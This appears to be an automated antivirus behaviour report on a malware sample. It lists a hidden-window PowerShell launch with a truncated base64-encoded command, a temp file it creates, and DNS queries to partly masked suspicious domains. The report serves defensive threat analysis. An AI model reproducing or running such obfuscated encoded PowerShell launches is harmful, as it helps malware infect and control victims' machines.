Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABYAEEAQQBvAEQAUQBBAD0AKAAnAGEAQQAnACsAJwBBACcAKwAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAGsAVQAnACwAJwBfAEEAJwApACkAOwAkAFUAWgBBAFEAQQBaAFEAdwAgAD0AIAAoACcANAAzACcAKwAnADgAJwApADsAJAB3AFEAXwB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1544
Modifies file system
Creates the following files
- %TEMP%\806400.cvr
Network activity
UDP
- DNS ASK de###usa.com
- DNS ASK pl##n.com
- DNS ASK hs#.pw
- DNS ASK me##and.com
- DNS ASK jo##tud.ru
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABYAEEAQQBvAEQAUQBBAD0AKAAnAGEAQQAnACsAJwBBACcAKwAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAGsAVQAnACwAJwBfAEEAJwApACkAOwAkAFUAWgBBAFEAQQBaAFEAdwAgAD0AIAAoACcANAAzACcAKwAnADgAJwApADsAJAB3AFEAXwB...' (with hidden window)
